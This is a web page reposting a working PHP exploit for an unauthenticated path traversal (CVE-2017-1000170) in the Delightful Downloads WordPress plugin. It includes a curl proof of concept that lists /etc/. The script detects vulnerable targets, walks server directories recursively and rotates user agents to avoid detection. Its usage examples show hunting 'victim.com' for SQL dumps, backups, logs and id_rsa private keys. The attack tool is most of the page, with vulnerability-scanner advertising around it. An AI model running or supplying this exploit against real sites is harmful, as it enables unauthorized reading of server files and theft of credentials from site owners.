wordpress plugin delightful downloads jquery file tree 1.6.6 path traversal

▸▸▸ Exploit & Vulnerability >>   webapps exploit & php vulnerability




Online Vulnerability Scanner Tools
wordpress plugin delightful downloads jquery file tree 1.6.6 path traversal Code Code... 
				
# Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
# Date: 19/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads
# Version: <=1.6.6
# Tested on: Debian 11
# CVE : CVE-2017-1000170
# PHP version (exploit): 7.3.27
# POC: curl --data "dir=/etc/" http://example.com/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php

<?php

$vuln_file = "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"; // do not change

$agents = ["Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.0; Trident/3.0)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X; sl-SI) AppleWebKit/531.37.3 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6531.37.3",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_6_6 rv:6.0) Gecko/20120629 Firefox/35.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.1)",
"Mozilla/5.0 (iPad; CPU OS 7_2_2 like Mac OS X; sl-SI) AppleWebKit/531.5.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B113 Safari/6531.5.4",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0) AppleWebKit/5321 (KHTML, like Gecko) Chrome/37.0.837.0 Mobile Safari/5321",
"Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/535.12.4 (KHTML, like Gecko) Version/5.1 Safari/535.12.4",
"Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X; en-US) AppleWebKit/531.18.4 (KHTML, like Gecko) Version/4.0.5 Mobile/8B118 Safari/6531.18.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.12.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.12.4",
"Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Win 9x 4.90; Trident/5.0)",
"Opera/8.98 (Windows NT 5.0; en-US) Presto/2.11.268 Version/10.00",
"Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X; sl-SI) AppleWebKit/534.16.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6534.16.2",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100107 Firefox/36.0",
"Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/535.23.6 (KHTML, like Gecko) Version/4.0.2 Safari/535.23.6",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20120805 Firefox/36.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0) Gecko/20130123 Firefox/37.0",
"Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.1)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_9 rv:6.0) Gecko/20190226 Firefox/36.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.39.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.39.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:4.0) Gecko/20160603 Firefox/37.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_9 rv:5.0; en-US) AppleWebKit/532.20.3 (KHTML, like Gecko) Version/4.0 Safari/532.20.3",
"Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/5340 (KHTML, like Gecko) Chrome/37.0.813.0 Mobile Safari/5340",
"Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362",
"Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1",
"Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00",
"Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)",
"Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7",
"Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341",
"Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00",
"Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00",
"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X; en-US) AppleWebKit/535.7.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B115 Safari/6535.7.5",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362",
"Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1",
"Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00",
"Mozilla/5.0 (Windows; U; Windows 98; Win 9x 4.90) AppleWebKit/535.13.4 (KHTML, like Gecko) Version/4.0.4 Safari/535.13.4",
"Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)",
"Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7",
"Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0",
"Opera/8.11 (X11; Linux x86_64; en-US) Presto/2.11.165 Version/11.00",
"Mozilla/5.0 (iPad; CPU OS 7_2_1 like Mac OS X; en-US) AppleWebKit/532.33.6 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6532.33.6",
"Opera/9.71 (X11; Linux x86_64; sl-SI) Presto/2.10.180 Version/11.00",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:5.0) Gecko/20130122 Firefox/36.0",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Trident/3.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows 95; Trident/4.1)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.1)",
"Opera/8.33 (X11; Linux x86_64; en-US) Presto/2.8.320 Version/12.00",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20121221 Firefox/36.0",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_9 rv:4.0) Gecko/20200625 Firefox/35.0",
"Mozilla/5.0 (Windows NT 6.0; sl-SI; rv:1.9.0.20) Gecko/20200505 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.44.4 (KHTML, like Gecko) Version/5.0 Safari/532.44.4",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_9 rv:3.0) Gecko/20201229 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.17.6 (KHTML, like Gecko) Version/4.1 Safari/531.17.6",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/5311 (KHTML, like Gecko) Chrome/38.0.877.0 Mobile Safari/5311",
"Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/531.4.3 (KHTML, like Gecko) Version/5.1 Safari/531.4.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0 rv:4.0) Gecko/20140118 Firefox/35.0",
"Mozilla/5.0 (Windows 95) AppleWebKit/5330 (KHTML, like Gecko) Chrome/36.0.847.0 Mobile Safari/5330",
"Opera/8.39 (Windows 98; sl-SI) Presto/2.9.202 Version/11.00",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5 rv:3.0; en-US) AppleWebKit/534.11.4 (KHTML, like Gecko) Version/5.0 Safari/534.11.4"];


function post_request($url, $data, $random_agent = 0){
    global $agents;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_POST, true);
	curl_setopt($ch, CURLOPT_POSTFIELDS, array("dir" => $data));
	#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080");	//debug w/ burp
	if($random_agent){
		curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]);
	}

    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

function parse_dir($str){ // by raina77ow =)
  $contents = array();
  $startFrom = $contentStart = $contentEnd = 0;
  while (false !== ($contentStart = strpos($str, 'rel="', $startFrom))){
    $contentStart += 5;
    $contentEnd = strpos($str, '">', $contentStart);
    if (false === $contentEnd){
      break;
    }
    $contents[] = substr($str, $contentStart, $contentEnd - $contentStart);
    $startFrom = $contentEnd + 2;
  }
  return $contents;
}


function list_files($url,$path, $recursive=0,$filter){
	global $vuln_file;
	global $recursive;
	global $random_agent;
	$exts = "";
	$extensions = "";
	$files = "";
	(count($filter) > 0) ? $has_filter = 1 : $has_filter = 0;

	$parsed = parse_dir(post_request($url.$vuln_file, $path, $random_agent)); // array tree

	foreach($parsed as $file_or_folder){
		if($has_filter){
			foreach($filter as $filtered){
				if(strpos($file_or_folder, $filtered) !== false){ //if the current file contains any of the filter
			        echo "  ".$file_or_folder."\n";
			        continue;
				}
				if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder
				    if($recursive){ //if recursive flag is set, enter on each folder and do it
				        list_files($url, $file_or_folder, $recursive, $filter);
				    }
				    continue 2; // continue the outermost foreach
				}
			}
		continue; // if has filter, always restart the loop here
		}

		if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder
		    if($recursive){ //if recursive flag is set, enter on each folder and do it
		        list_files($url, $file_or_folder, $recursive, $filter);
		    }else{
		        echo "  ".$file_or_folder."\n"; //if it's not to be recursive, just print the folder name
		    }
		}else{ //is a file
		    echo "  ".$file_or_folder."\n";
		}
		continue;
	}
}


function alert_user($target,$path, $recursive, $filter){ //scan the root of the server recursivelly can really be a pain
	if($path == "/" && $recursive == 1){
		echo red("  [i] WARNING: Scanning the root of the webserver recursivelly can
  exceed the timeout limit, block your IP or even take down the server.
  Are you sure you want to continue? [y/N] ");
		$handle = fopen ("php://stdin","r");
		$line = fgets($handle);
		if(trim(strtoupper($line)) != 'Y'){
		    echo "\n  Aborted. Try running me without the recursion flag\n\n";
		    exit;
		}
		fclose($handle);
		echo cyan("\n\n  Ok, don't say I didn't warn you...\n");
	}
	list_files($target,$path, $recursive, $filter);
}


############################################################

function green($str){
    return "\e[92m".$str."\e[0m";
}
function red($str){
    return "\e[91m".$str."\e[0m";
}
function yellow($str){
    return "\e[93m".$str."\e[0m";
}
function cyan($str){
    return "\e[96m".$str."\e[0m";
}

function banner(){
	echo "
  _____       _ _       _     _    __       _ _______
 |  __ \     | (_)     | |   | |  / _|     | |__   __|
 | |  | | ___| |_  __ _| |__ | |_| |_ _   _| |  | |_ __ ___  ___
 | |  | |/ _ \ | |/ _` |  _ \| __|  _| | | | |  | | ยด__/ _ \/ _ \
 | |__| |  __/ | | (_| | | | | |_| | | |_| | |  | | | |  __/  __/
 |_____/ \___|_|_|\__, |_| |_|\__|_|  \__,_|_|  |_|_|  \___|\___|
   		   __/ |                ".green("Coder:  ").yellow("Nicholas Ferreira")."
 		  |___/				     0x7359

  ".cyan("Delightful Downloads - Jquery File Tree")."
  Unauthenticated Path Traversal exploit ".
red("\n  (CVE-2017-1000170)")."

";
}



// ======================= CHECKING =======================



$short_args = "u:h::p:r::f:a::";
$long_args = array("url:","help::","path:","recursive::","filter:","random-agent::");
$options = getopt($short_args, $long_args);

if($argc == 1){
	die(banner()."  Usage: php xpl_jqueryFileTree.php -u url [-x extensions] [-p path] [-r] [-h] [-a]\n\n  Help: -h or --help\n\n");
}

if(isset($options['h']) || isset($options['help'])){
banner();
die( "  Usage: php ".$argv[0]." -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]

  -h, --help: Show this message
  -u, --url: URL of target
  -a, --random-agent: Use random user agents
  -f, --filter: Name of files or extensions to search for (separated by comma)
  -p, --path: The full path from which the filenames will be read (default: /)
  -r, --recursive: Generates the tree recursivelly (be careful)

  e.g.: ".cyan($argv[0]." -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r")."
        |
         \-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths
             (You must provide the dot to indicate it's an extension)

        ".cyan($argv[0]." -u victim.com -f .log,id_rsa -a -r")."
        |
         \-> This will search for all files named \"id_rsa\" or having the extension
             \".log\" within all folders of the server, with random user-agents

        ".yellow("Tip: use \"php ..... | tee output\" to save the result to an output file")."


");

}

$random_agent = 0;
if(isset($options['a'])){
	$random_agent = 1;
}elseif(isset($options['random-agent'])){
	$random_agent = 1;
}

$target = "";
if(isset($options['u'])){
	$target = $options['u'];
}elseif(isset($options['url'])){
	$target = $options['url'];
}

$recursive = 0;
if(isset($options['r'])){
	$recursive = 1;
}elseif(isset($options['recursive'])){
	$recursive = 1;
}

$path = "/";
if(isset($options['p'])){
	$path = $options['p'];
}elseif(isset($options['path'])){
	$path = $options['p'];
}


if($path !== "/"){
	if(!preg_match("#^\/.*\/$#", $path)){
		$path = str_replace("//", "/", "/".$path."/"); // $path must be of the form /<path>/ for this to work, so lets force it
	}
}


$extensions = "";
if(isset($options['f'])){
	$extensions = $options['f'];			//strings
}elseif(isset($options['filter'])){
	$extensions = $options['filter'];	//string
}

$filter = array();

if($extensions !== ""){
	$filter = explode(",", $extensions);
}


// ========================= END CHECKING ==========================

function is_vulnerable($url){
	global $vuln_file;
	global $random_agent;
	global $filter;

	echo "  [*] Target: ".$url."\n";
	if(count($filter) > 0){
		echo "  [*] Filter: ".implode(", ", $filter)."\n\n";
	}
	echo cyan("  [i] Checking if the target is vulnerable...\n");
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url.$vuln_file);
    curl_setopt($ch, CURLOPT_NOBODY, true); // HEAD request to vulnerable file
	curl_exec($ch);
 	$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

	if(substr($code,0,1) == 2){ // 2xx
		echo yellow("  [i] HTTP response of vulnerable file is 2xx. May be vulnerable!\n");
		$post = post_request($url.$vuln_file, "/", $random_agent);
		if(preg_match_all("/jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)/", strtolower($post))){
			echo green("  [+] Target is vulnerable! Getting file list...\n\n");
			return true;
		}
		echo red("  [-] Target is not vulnerable... =(\n\n");
	}else{
		echo red("  [-] Could not find a valid vulnerable file. Maybe it doesn't exist, 
  you don't have permission to read it or it is in another directory.\n");
	}
	return false;
}
banner();

if(is_vulnerable($target)){
	global $filter;
	alert_user($target,$path, $recursive, $filter);
	echo green("\n  [+] Done!\n\n");
}

?>

Wordpress plugin delightful downloads jquery file tree 1.6.6 path traversal Vulnerability / Exploit Source : Wordpress plugin delightful downloads jquery file tree 1.6.6 path traversal



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.